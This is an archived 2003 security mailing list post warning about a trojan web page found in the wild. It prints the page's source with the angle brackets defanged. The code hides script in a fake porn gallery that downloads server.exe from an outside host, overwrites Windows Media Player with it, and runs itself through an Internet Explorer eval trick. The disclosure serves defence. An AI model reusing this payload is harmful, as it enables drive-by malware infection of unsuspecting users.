| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20031008153246.1C9DD38108@mail.secnap.net>
From: scheidell at secnap.net (Michael Scheidell)
Subject: interesting trojan in the wild
This just found in the wild:
I replaced the < character with a ^ to make sure the script doesnt
inadvertantly run on your machine
this replaces your media player with a trojan, and I'm assuming on MSIE
is vulnerable
heres the code
^script language="JavaScript">
^!--
document.cookie='from=noref; expires=Wednesday, 8-Oct-03 23:17:30 GMT;';
//-->
^/script>
^html>
^head>
^script language="Javascript">
^!--
var exit=true;
function exitmoney() { if (exit)
open("http://www.freemedias.com/pop.html","new_window"); }
//-->
^/script>
^meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
^meta name="GENERATOR" content="Microsoft FrontPage 4.0">
^meta name="ProgId" content="FrontPage.Editor.Document">
^title>FREE PORN GALLERY^/title>
^/head>
^body onUnload="exitmoney()">
^textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://www.freemedias.com/404/server.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media
Player\\wmplayer.exe",2);
location.href = "mms://";
^/textarea>
^script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i^lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}
window.open("ieerror.php","_media");
setTimeout("doit()", 3000);
^/script>
^p align="center">
^A
href="http://www.vigrx.com/clicks/clickthrough.html?a=sexxxsite&b=172"
onclick="exit=false">^IMG
src="vigpillhorizontal15.gif" border=0 width="468" height="80">^/A>^br>
^b>EVERY TIME YOU REFRESH THIS PAGE NEW PICTURES WILL SHOW!.^/b>
^p align="center">
^script src="start.php">^/script>
^script src="randpic.php?1">^/script>
^script src="randpic.php?2">^/script>
^script src="randpic.php?3">^/script>
^script src="randpic.php?4">^/script>^br>
^script src="randpic.php?5">^/script>
^script src="randpic.php?6">^/script>
^script src="randpic.php?7">^/script>
^script src="randpic.php?8">^/script>^br>
^script src="randpic.php?9">^/script>
^script src="randpic.php?10">^/script>
^script src="randpic.php?11">^/script>
^script src="randpic.php?12">^/script>^br>
^script src="end.php">^/script>
^/p>
^p align="center">^font face="Arial Narrow" size="4">^b>NO CREDIT CARD -
NO BANK
ACCOUNT - NO AGE VERIFICATION^/b>^/font>^a
href="http://c.fsx.com/c?z=548,81084,8,pffa,pinkforfree.com/"
onclick="exit=false">^font face="Arial Narrow" size="4">^b>^br>
^/b>^/font>^img
src="http://www.pinkforfree.com/banners/banners/p4f_468-05.jpg"
width="468" height="60">^br>
^/a>^b>100% FREE HIGH QUALITY PORN^/b>^/p>
^/body>
^/html>
--
Michael Scheidell
SECNAP Network Security, LLC
Main: 561-368-9561 / www.secnap.net
Looking for a career in Internet security?
http://www.secnap.net/employment/
Powered by blists - more mailing lists